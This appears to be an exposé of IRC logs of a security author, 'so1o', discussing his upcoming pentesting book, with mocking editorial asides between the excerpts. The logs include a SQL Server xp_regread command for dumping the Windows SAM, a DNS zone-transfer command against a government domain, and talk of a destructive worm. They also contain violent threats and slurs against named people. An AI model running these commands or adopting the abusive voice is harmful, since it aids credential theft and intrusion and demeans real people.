[20:09:32] <so1o> chapter 4 is all about scanning
[20:09:39] <so1o> the later chapters drill down into services
[20:09:46] <so1o> web, ftp, sql, bla blah blaha
[20:10:29] <B-r00t> this sounds goos dude ...
[20:10:46] <B-r00t> if yu want to host it here ...ill give yu a slot!
[20:10:57] <B-r00t> s/goos/good/ ..soz
[20:11:19] <so1o> bro
[20:11:25] <so1o> its being published by oreilly
[20:11:26] <so1o> in november
[20:11:28] <so1o> u klutz
[20:11:29] <so1o> ;]
[20:11:38] <B-r00t> oh right yeah sorry ... the big time ..wo0two0t!
[20:11:42] <so1o> exactly
[20:11:44] <so1o> teh big time!
[20:11:53] <giles> you are going to have major bling
[20:12:01] <giles> get your teeth all iced
[20:12:10] <so1o> yeah well i got my advance last week
[20:12:15] <so1o> 5k
[20:12:18] <giles> not bad
[20:12:25] <giles> how long did it take to write
[20:12:26] <giles> ?
[20:12:30] <so1o> yeah considering most of the book is written
[20:12:34] <so1o> 3 years so far on and off
[20:12:39] <so1o> probably 6 months
[20:12:43] <so1o> of determined effort
[20:12:44] <so1o> ;]
[20:12:48] <giles> nice
[20:12:56] <so1o> hit me up with some feedback
[20:13:08] <so1o> and i might send over some other chapters
[20:13:13] <so1o> my web assessment chapter is dark
[10:38:34] <so1o> lemme paste the chapter list..
[10:38:57] <so1o> Chapter 1, Network Security Assessment, introduces and
discusses the rationale behind network security assessment and the fact that
assurance of security is a process and not simply a product.
[10:38:57] <so1o> Chapter 2, The Tools Required, covers the various
Unix-based operating platforms and tool kits that determined attackers and
network security professionals can be found using.
[10:38:57] <so1o> Chapter 3, Internet Host & Network Enumeration, logically
walks through the Internet-based options that a potential attacker has to
map your network from open web searches through to DNS sweeping and querying
of authoritative name servers.
[10:38:57] <so1o> Chapter 4, IP Network Scanning, discusses all known IP
network scanning techniques and their relevant application, also listing
tools and systems that support such scanning types. IDS evasion and
low-level packet analysis techniques are also covered.
[10:38:57] <so1o> Chapter 5, Assessing Remote Information Services, defines
the techniques and tools used to execute information leak attacks against
services such as LDAP, auth, finger and DNS. Some process manipulation
attacks are discussed here where appropriate.
[10:38:57] <so1o> Chapter 6, Assessing Web Services, comprehensively covers
the assessment of web services including IIS, Apache, OpenSSL and other
components such as Frontpage Extensions and Outlook Web Access. Risk
mitigation strategies are also detailed, including use of egress network
filtering and web service configuration.
[10:38:58] <kraft> k
[10:39:18] <so1o> then 7 - 12 are all about specific services, rpc, windows
services, etc.
[10:39:25] <so1o> 13 is about application security
[10:39:47] <so1o> 14 is about example assessment methodologies (against
win2k web server, linux mail server and cisco ios router)
[10:39:55] <so1o> and then its onto the appendices
Sometimes my friends and I play this game called, "Think Like a Hacker,"
where we try to imagine what we would do if we weren't some of England's
best paid and well established ethical hackers :)
[19:52:47] <so1o> there are plenty more bugs in rpc
[19:52:50] <so1o> someone should find one
[19:52:55] <so1o> and write a new worm
[19:53:00] <so1o> i.e. not publicize it
[19:53:03] <so1o> if i did that
[19:53:07] <so1o> i'd write the most darkside worm
[19:53:10] <so1o> that just spread
[19:53:16] <so1o> and after 48 hours rm'd the boxes
[22:20:29] <so1o> whats new in nmap
[22:20:33] <so1o> i need to update my book chapter
[22:24:55] <kraft_> did matta have a stand at infosec ?
[22:25:22] <so1o> nah we never do
[22:25:28] <so1o> its too expensive
See the comments on TESO below :)
[15:05:36] <so1o> i talk about telnetfp in my book
[15:05:44] <so1o> its the best thing for fingerprinting telnet services
[16:43:40] <so1o> i have a digital camcorder
[16:43:49] <so1o> i cAN MAKE MOVIES
[16:45:52] <so1o> !!!!!!!!!!!!!!!11
Hmm... maybe I can send the techtv editors a last-minute submission
for that hacking special they did on phobos/cold-fire/cjunkie.
[23:38:54] <so1o> ha
[23:39:01] <so1o> i have 7350buttseckz
[23:39:09] <so1o> teso are fucking retarded anyhow
[23:39:10] <so1o> f teso
NOTE: teso made the hacking part of this book possible.
[23:45:46] <so1o> f attrition
[23:45:51] <so1o> brian martin is a punk
[23:45:53] <so1o> if i ever meet him
[23:45:58] <so1o> im gonna remix him
[23:46:20] <so1o> he is a stupid cunt
[23:46:27] <so1o> honestly tho
[23:46:32] <so1o> i would have no regrets
[23:46:36] <so1o> in breaking his legs
[23:46:43] <so1o> i would do jail time for that
[23:47:02] <so1o> fucking punk
NOTE: Without the attrition.org mirrors of my defacements provided
in hyperlink format on my resume, I might still be unemployed today!
[23:50:46] <so1o> im writing a book for oreilly
[23:50:48] <so1o> about pentesting
[23:50:55] <embrey> oh yah ? nice.
[23:50:58] <embrey> good money in that ?
[23:50:59] <so1o> it'll be published in january..
[23:51:03] <so1o> yeah well 8k usd advance
[23:51:08] <so1o> and 10% royalties
[23:51:13] <embrey> first book ?
[23:51:17] <so1o> yep
[23:51:21] <embrey> congrats
[23:51:27] <so1o> yeah well it took me over 2 years
[23:51:36] <so1o> to get oreilly to agree to acquire me
[23:51:37] <embrey> it's a phone book huh ?
[23:51:38] <so1o> as an author
[23:51:45] <so1o> nop this is the thing
[23:51:54] <so1o> when its published it'll be 280-300 pages
[23:51:58] <so1o> hacking exposed is like 800 pages
[23:52:00] <so1o> of shit
[23:52:02] <embrey> yep they all are
[23:52:09] <embrey> all get pirated now to
[23:52:17] <so1o> john mcdonald, david litchfield, ben laurie
[23:52:20] <so1o> and a few other ppl
[23:52:23] <so1o> are doing my technical review
[23:52:26] <embrey> they contributed to it ?
[23:52:30] <so1o> i got to pick my own tech reviewers
[23:52:30] <so1o> ;]
[23:52:33] <embrey> nice
[23:52:49] <so1o> yeah so thats going to make it pretty lockdown
[23:52:52] <so1o> in terms of info
[23:53:39] <so1o> hacker cracker
[23:53:43] <embrey> yah yah
[23:53:43] <so1o> by that ejovi guy
[23:53:51] <so1o> joej__
[23:53:53] <so1o> or something
[23:53:56] <embrey> yah
[23:54:06] <so1o> yeah f him
[23:54:10] <so1o> all those american cunts
[00:05:40] <embrey> are you the so1o those phc guys hate ?
[00:06:47] <so1o> yeah
[00:06:49] <so1o> f phc
[00:06:51] <so1o> they are fake as fuck
[00:06:55] <embrey> i thought i reconized the nick
[00:06:58] <embrey> didn't know from where.
[00:06:58] <so1o> i used to be on phc
[00:07:03] <so1o> when gayh1tler ran it
[00:07:07] <so1o> then he left
[00:07:14] <embrey> that's the guy that runs the mailinglist no ?
[00:07:17] <so1o> and all these new ppl started jumping up
[00:07:21] <so1o> like jimjones
[00:07:22] <embrey> all these people and grps are confusing as shit
[00:07:24] <so1o> and halfdead
[00:07:29] <so1o> = fake phc
[00:07:31] <embrey> he's a ass
[00:07:35] <so1o> yeah 4rea
[00:07:36] <so1o> l
[00:07:37] <so1o> thatz about it
[00:07:44] <embrey> i've seen tons of logs with him. does nothing but insult
people
[00:07:50] <so1o> exactly
[00:07:55] <so1o> but yeah
[00:07:56] <so1o> itz me
[00:08:00] <so1o> the imfam0uz
[00:08:00] <embrey> talk about how he wrote dos virii in nineteen fucking
eight two or some shit
[00:08:29] <so1o> the funny thing is when i go into meetings
[00:08:34] <so1o> with sec ppl from banks or whatnot
[00:08:39] <so1o> 'werent u that so1o guy'
[00:08:42] <so1o> 'from back in the day'
[00:08:46] <so1o> hahaahaaaaaaaaaaa
[00:08:46] <so1o> cunts
[00:08:59] <embrey> it doesn't hold you back ? lose any jobs because of it ?
[00:09:15] <so1o> nah well this is the thing
[00:09:20] <so1o> we lost a 300k pentesting deal because of it
[00:09:33] <so1o> because of attrition.org in particular
[00:09:36] <so1o> but other than that
[00:09:39] <so1o> everythings cool
[00:09:43] <so1o> a lot of our clients think its neat
[00:09:49] <so1o> that i kno what im talking about
[00:09:54] <so1o> and we have a lot of big clients
[00:10:04] <embrey> there's that kind of money in that ?
[00:10:09] <so1o> merrill lynch, barclays, american express
[00:10:10] <so1o> yeah
[00:10:14] <so1o> big dollar in proper pentesting
[00:10:19] <so1o> like framework agreements
Thanks for looking past our disagreements in the past and letting me
publish this article in your wonderful magazine, PHC!
[00:12:14] <embrey> so attrition guys ratted you out for defacements ?
[00:12:23] <so1o> yeah basically
[00:12:30] <so1o> and linked me to antionline
[00:12:33] <so1o> all sorts of shit
[00:12:40] <embrey> they were real cozy with pigs eh ?
[00:12:49] <embrey> eww antionline ?
[00:13:21] <so1o> yeah
[00:13:33] <so1o> back in the day i was investigating using antionline for
marketing space
[00:13:34] <embrey> you hacked it right ?
[00:13:36] <so1o> like banners and whatnot
[00:13:39] <so1o> yeah well i hacked it too
[00:13:41] <so1o> in the end
[00:14:37] <so1o> when my book drops everything will get remixed
[00:15:36] <so1o> yeah embrey well i figured if i wrote a book, i wouldnt
have trouble getting a job ever again
[00:17:11] <embrey> mister so1o your old huh ?
[00:17:14] <so1o> 23
[00:17:20] <embrey> oh ok
[00:17:31] <so1o> left school at 17
[00:17:33] <so1o> fuck that shit
[00:17:34] <so1o> get a job
[00:17:41] <so1o> i worked at EDS for like 6 weeks
[00:17:41] <embrey> some www had you listed as 38 hehe
[00:17:44] <so1o> and got fired
[00:17:47] <so1o> for winnuking the fuck
[00:17:50] <embrey> peroit old company
[00:17:55] <so1o> out of the people i didnt like
[00:17:56] <so1o> :/
[00:18:10] <so1o> "DAMNIT MY MACHINE HAZ CRASHED AGAIN!"
[00:18:16] <so1o> "MUST BE A HARDWARE PROBLEM!"
[00:18:18] <so1o> haaaaaaaa
[00:18:20] <so1o> fucking cunts
[00:24:16] <embrey> so you work for barclays now ? i heard something about
their atms' this week
[00:24:23] <so1o> nah i dont work for barclays
[00:24:26] <so1o> i work for matta
[00:24:29] <so1o> matta is my company
[00:24:37] <embrey> and in turn they work for barclays...
[00:24:42] <so1o> there are only 5 of us
[00:24:44] <flame> hmm
[00:24:45] <so1o> yeah exactly
[00:28:56] <so1o> i like el8 magazine
[14:24:54] <so1o> has anyone seen phrack 62
[14:24:55] <so1o> the fake one
[14:25:00] <so1o> thats a lot like ~el8 magazine
[14:25:19] <Haggis> no.. haven't read it ... yer book or phrack that is...
can you /msg me the the link and i'll get it done this evening...
[14:25:35] <Haggis> you mentioned a SQL section ...
[14:25:47] <so1o> yeah
[14:25:49] <so1o> exactly
[14:26:23] <so1o> xp_regread
[14:26:23] <so1o> The xp_regread procedure allows us to dump registry keys
from the database server. In particular this is useful to glean encrypted
password strings for software such as VNC, or the Windows SAM database (if
SYSKEY encryption is not in use). To dump the SAM from the registry, we
would issue the following command:
[14:26:23] <so1o> EXEC xp_regread
HKLM,'SECURITY/SAM/Domains/Account','c:/temp/out.txt'
[14:26:25] <so1o> !!!!!!!!!!1111
[14:26:56] <Haggis> linsql can do that too.. well, the non-public version ;)
[14:27:04] <so1o> linsqqqqqqqlllllll
[14:27:09] <so1o> bro u gotta hook it up
[14:27:15] <so1o> so ican put it in my oreilly book
[14:27:19] <so1o> and mAKE U FAM0UZ
[14:27:44] <Haggis> no thanks ;) i remember that kind of fame!
[14:28:01] <so1o> ha
[14:28:05] <so1o> every1 wantz to be fam0uz
[14:28:06] <so1o> me me me
[14:28:09] <so1o> make me a star!
[15:10:12] <so1o> idefense are funny
[15:10:16] <so1o> i want to work for them someday
[15:10:32] <so1o> i think they'll go out of business tho
[15:10:34] <giles> so1o: no more reads ?
[15:10:35] <so1o> by the end of the day
[15:10:37] <so1o> year
[15:10:43] <so1o> giles not today bro i'm locking down this chapter
[15:10:46] <so1o> on windows network services
[15:10:53] <so1o> 135, 137, 138, 139, 445
[15:10:59] <so1o> laying it down straight
[15:11:10] <giles> i would be curoius on your section dealing with linux and
nix based security
[15:11:12] <so1o> like did u kno u can brute force passwords of users in the
administrators group
[15:11:20] <so1o> through the wmi interface accessible via. port 135
[15:11:29] <so1o> ?
[15:11:37] <giles> cool, i look forward to reading about that
[15:11:48] <so1o> and then, when you've brute forced the pass
[15:11:51] <so1o> u can execute commands
[15:11:54] <lord> psexec
[15:11:57] <giles> yeah
[15:11:58] <B-r00t> we could have a daily hack classs for each chapter ..
[15:11:59] <so1o> through tcp/135
[15:12:06] <so1o> lord whats psexec
[11:42:45] <so1o> the book is the bane of my life
[11:42:56] <B-r00t> will make good money do0d ..will be worth it .
[11:43:06] <so1o> str8 up
[11:43:33] <so1o> yeah well thats the plan
[11:43:41] <so1o> my hidden agenda is to put foundstone out of business
J/k!!!!!!!!!!!!!!!!!! ;)
12:09:43] <so1o> hm
[12:09:49] <so1o> i might save that for my second book
[12:09:55] <so1o> which is about internal security
[12:10:01] <Haggis> milk it dude!
[12:10:11] <so1o> ;]
[12:10:16] <so1o> well the whole point with this one
[12:10:20] <so1o> is that its under 300 pages
[12:10:25] <so1o> of remote stuff
[12:10:35] <so1o> if i start talking about local stuff
[12:10:39] <so1o> it will turn out being hacking exposed
[12:10:41] <so1o> all over AGAIN
[16:16:55] <so1o> i cant wait until my book is published and the matta
business collects our outstanding invoices in oct/nov
[16:17:02] <so1o> then i might be able to upgrade my car
[16:17:08] <so1o> i drive a 1.0 vw polo atm..
Thanks PHC, for sending me 3APA3A's wire tranfer #!
[23:42:54] <so1o> my bank account is in positive territory
[23:42:58] <so1o> for the first time in 2 years
[23:42:59] <so1o> easily
[23:43:15] <B-r00t> thats always a good thing ..
[23:43:16] <so1o> only because i consolidated my overdraft with one of my
natwest loans
[23:43:24] <B-r00t> med~ ..yer late been out on it ?
[23:43:24] <so1o> and oreilly wired me some more of my advance
[16:31:42] <so1o> i'm writing a book for o'reilly about security
[23:19:41] <so1o> K-SP1FF
[23:19:44] <so1o> SP1FFTASTIC
[23:19:45] <so1o> !!!!1
[23:19:56] <so1o> im writing a book about hacking
[23:20:03] <so1o> o'reilly are going to publish it
[23:20:06] <so1o> and 12308218214082480 hackers
[23:20:08] <so1o> will be BORN
[23:20:09] <so1o> !!!1
[23:20:24] <so1o> HACKING FOR CUNTS
[23:20:26] <so1o> !
[23:20:28] <giles_> hahah
[23:20:29] <so1o> no
[23:20:37] <so1o> "network security assessment"
[23:20:47] <so1o> hacking for cunts would be a good name tho
[23:23:42] <so1o> i gotta keep my book lean tho bro
[23:23:43] <so1o> no cd
[23:23:45] <so1o> paperback
[23:23:49] <so1o> 250 pages or so
[23:23:53] <so1o> to keep the costs down
[23:23:59] <so1o> so we can regulate hacking exposed
[23:24:05] <so1o> some sort of 80 bucks or something
[23:24:10] <so1o> and my book will be 25
INFORMATION MUST BE FREED!
[23:25:29] <so1o> ha
[23:25:37] <so1o> i dont care if people e-book and pir8 it
[23:25:49] <so1o> infact i might e-book it myself
[23:25:56] <so1o> with all the parts the publisher want to take out
[23:26:01] <so1o> well they dont atm
[23:26:11] <so1o> but if they do get me to take out my CIA examples
[23:26:12] <so1o> or whatnot
[23:26:17] <so1o> i'll put out an underground e-book
[23:26:22] <so1o> like the uncensored version
INFORMATION MUST BE FREED!
[23:25:56] <so1o> with all the parts the publisher want to take out
[23:26:01] <so1o> well they dont atm
[23:26:11] <so1o> but if they do get me to take out my CIA examples
[23:26:12] <so1o> or whatnot
[23:26:17] <so1o> i'll put out an underground e-book
[23:26:22] <so1o> like the uncensored version
[23:26:37] <so1o> oh in chapter 3
[23:26:46] <so1o> i explain how to map the cia's network
[23:26:48] <so1o> internally and shit
[23:27:01] <so1o> using whois, dns, sending mail to blahblah@ucia.gov
[23:27:02] <so1o> etc.
[23:27:08] <so1o> u can zone xfer the cia
[23:27:25] <so1o> dig @auth100.ns.uu.net ucia.gov axfr
[23:27:32] <so1o> its neat0
[23:28:05] <so1o> i wrote a white paper about it
[23:28:07] <so1o> for matta ages back
[23:28:11] <so1o> www.trustmatta.com/downloads/
[23:28:16] <so1o> - internet-based counterintelligence
[23:28:25] <so1o> oh and www.trustmatta.com/downloads/cia-map.jpg
[23:28:51] <so1o> ;; connect: Connection timed out
[23:28:51] <so1o> ; <<>> DiG 2.2 <<>> @auth100.ns.uu.net ucia.gov axfr
[23:28:51] <so1o> ; (1 server found)
[23:28:51] <so1o> ;; FROM: cyberforce to SERVER: 198.6.1.202
[23:28:51] <so1o> ;; WHEN: Tue Sep 30 00:55:32 2003
[23:28:58] <so1o> hm
[23:29:00] <so1o> timed out
[23:29:01] <so1o> http://www.trustmatta.com/services/docs/cia-map.jpg
[23:29:02] <so1o> even
[23:30:02] <so1o> ok
[23:39:46] <so1o> i got busted back in 1999
[23:39:54] <so1o> for hacking some *.spawar.navy.mil boxes
[23:39:59] <so1o> and trying to break into ncsc.mil
[23:40:02] <so1o> from there
[00:00:58] <so1o> so im writing a book for oreilly
[00:00:59] <so1o> they <3 me
[00:01:05] <so1o> they keep wiring me money
[00:01:10] <so1o> "i need more dollar"
[00:01:12] <so1o> "for my advance"
[00:01:19] <so1o> "plz send it ok thx!"
[15:44:08] <so1o> who the fuck are these dtors.net ppl
[15:44:11] <so1o> they look like students
[15:44:16] <so1o> fucking teenage students
[15:46:06] <so1o> anyhow dtors.net
[15:46:12] <so1o> who are those dropkickz
[15:46:35] <flame> one of them coded a sploit for ssl :| apartently works
[15:46:37] <so1o> webcamTASTIC
[15:46:48] <so1o> wrd
[15:46:52] <so1o> i dont see no working expl
[15:46:55] <so1o> maybe someone can hook me up
[11:02:59] <so1o> i'm writing a book for oreilly
[11:03:02] <so1o> if thatz what u mean
[11:03:20] <lewney> about security?
[11:03:27] <so1o> 'network security assessment'
[11:13:09] <so1o> my book is going to fuck the industry up
[11:13:15] <so1o> everything will be owned
[11:13:29] <so1o> the follow-up book will be the killer tho
[11:13:33] <so1o> about internal network security
[11:13:45] <so1o> and what u can do if you have access to the wire n shit
[11:13:56] <so1o> that wont be an oreilly book
[11:14:02] <so1o> im going to release that anonymously
[11:14:12] <so1o> through some publisher like no starch books or something
[13:51:42] <so1o> just mention the whole o'reilly book thing
[13:51:49] <so1o> and the fact that i will lock them down
[13:51:54] <so1o> like nobody ever has
[13:51:58] <so1o> i will rock them
[16:31:09] <so1o> it'll be out in january bro
[16:31:25] <so1o> the first 7 chapters (half the book) has been copy edited
and is ready to print
[16:31:37] <giles_> i thought you were pushing for NOV
[16:31:42] <giles_> as a relesase date
[16:31:44] <so1o> um
INFORMATION MUST BE FREED!
[16:43:36] <so1o> man i fucking hate oracle
[16:43:43] <so1o> i hate proprietary shit
[16:43:44] <so1o> :/
[16:43:59] <so1o> im writing about hacking the tns listener
[16:44:02] <so1o> for my oreilly book
[16:44:14] <so1o> and the more i research oracle
[16:44:18] <so1o> the more complex it becomes
[13:11:54] <so1o> my book will fuck shit upo
[13:11:56] <so1o> !!!!111
[13:11:59] <so1o> df did u kno
[13:12:02] <so1o> i am writing a book for oreilly
[13:12:04] <so1o> about hacking
[15:25:34] <so1o> my book is too darkside
[15:25:36] <so1o> to pdf
[13:14:56] <so1o> yeah i kno
[13:15:03] <so1o> dont want to make the book a big howto tho
[13:16:40] <so1o> i'll just put it in the 2nd edition due out in 2005
[13:18:45] <akriel> so1o, you wrote a book?
[13:18:48] <so1o> yeah for oreilly
[13:18:51] <giles> yo
[13:18:51] <so1o> on pentesting
[13:18:58] <akriel> so1o, what was title?
[13:19:10] <so1o> network security assessment
[13:19:12] <so1o> out in january 2004
[13:19:21] <akriel> you wrote the whole thing?
[13:19:31] <so1o> yeah
[12:11:53] <so1o> anyone got access to a solaris 9 box and nmap 3.45 or 3.48
[12:11:59] <so1o> i need an rpc scan result
[12:12:04] <so1o> to put in teh book
[15:26:29] <so1o> one day my book will be finished
[15:26:31] <so1o> and it will be good
[15:26:33] <so1o> until then
[15:26:34] <so1o> itz not
[15:33:01] <so1o> one day i might work at idefense
[15:33:05] <so1o> if they pay me
[15:47:23] <so1o> mine are hardcore tho
[15:47:36] <so1o> john mcdonald, ben laurie, jeff fay
[15:47:40] <so1o> and i tried to get david litchfield
[15:47:44] <so1o> but he didnt return emailz
Watch out for these advanced topics, coming in the sequel!
[11:50:11] <so1o> if i am talking about memory layout in intel x86
[11:50:12] <so1o> it goes..
[11:50:19] <so1o> text
[11:50:19] <so1o> data
[11:50:21] <so1o> bss
[11:50:22] <so1o> heap
[11:50:29] <so1o> stack
[11:50:40] <so1o> 0xffffffff
[11:50:41] <so1o> right
[11:50:52] <so1o> i mean its sparc which has the heap and stack upside down
right?
[11:51:34] <lewney> [text][data][<-- stack]
[11:51:40] <lewney> [data] [ bss ][ heap -->]
[11:51:43] <lewney> thats the layout
[11:51:44] <lewney> :)
[11:52:32] <so1o> hm
[11:52:35] <so1o> now you've confused me
[11:52:49] <so1o> i thought it was
[11:52:52] <so1o> 0x00000000
[11:52:53] <so1o> text
[11:52:54] <so1o> data
[11:52:55] <so1o> bss
[11:52:56] <so1o> heap
[11:52:57] <so1o> stack
[11:52:59] <so1o> 0xffffffff
[11:53:11] <so1o> and the heap/stack grow down/up accordingly
[11:53:32] <so1o> so you're saying its..
[11:53:39] <so1o> text
[11:53:39] <so1o> data
[11:53:40] <so1o> stack
[11:53:41] <so1o> data
[11:53:42] <so1o> bss
[11:53:43] <so1o> heap
[11:53:44] <so1o> ?
[11:54:17] <lewney> yeah at least I think it is :)
[11:54:29] <so1o> crazy bread
[11:54:47] <so1o> the diagram i got says runtime memory organization is
text, data,bss, heap, stack
[11:54:48] <so1o> :/
[11:54:55] <so1o> where did br00t ho
[11:54:56] <so1o> go
[11:55:23] <lewney> ill ask esdee
[11:55:28] <so1o> ok
[11:56:25] <lewney> nah its the first datagram
[11:56:26] <lewney> you were right
[11:57:12] <so1o> coo
[11:57:14] <so1o> where is esdee
[11:57:40] <lewney> msn
[11:57:40] <lewney> :P
[11:58:13] <so1o> i8
[11:58:35] <lewney> but the first one was right
[12:02:43] <so1o> ok
[12:02:57] <so1o> ask esdee which architectures turn heap and stack up the
other way
[12:03:02] <so1o> i think its only sparc
[12:05:49] <lewney> he says that on Solaris the heap gets mapped at a 0x4000
address
[12:06:02] <lewney> and the stack on an address like 0xfffe0000
[12:06:29] <so1o> heh crazy
[12:06:39] <so1o> which way do they grow though
[12:06:53] <so1o> does sparc stack grow from 0xffffe0000 down to 0xffffffff
[12:06:55] <so1o> or up
[12:07:03] <so1o> and same with heap
[12:11:31] <lewney> I've asked him
[12:11:57] <lewney> hmm so1o
[12:12:10] <lewney> it grows up
[12:12:39] <lewney> it being the stack
[12:12:44] <lewney> I have to be afk now
[12:12:49] <lewney> gonna buy diablo
[12:12:51] <lewney> bbiab
[12:15:24] <so1o> hm
[12:15:31] <so1o> maybe its the heap that grows the other way
[12:15:37] <so1o> i just remember horizon talking ages ago
[12:15:46] <so1o> about how sparc fucks with his head sometimes
Please email me if you find out the answer to this one!
[12:36:19] <so1o> when talking about text and bss segment
[12:36:20] <so1o> s
[12:36:27] <so1o> what does bss stand for?
|=[ EOF ]=---------------------------------------------------------------=|
扫一扫
3082
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
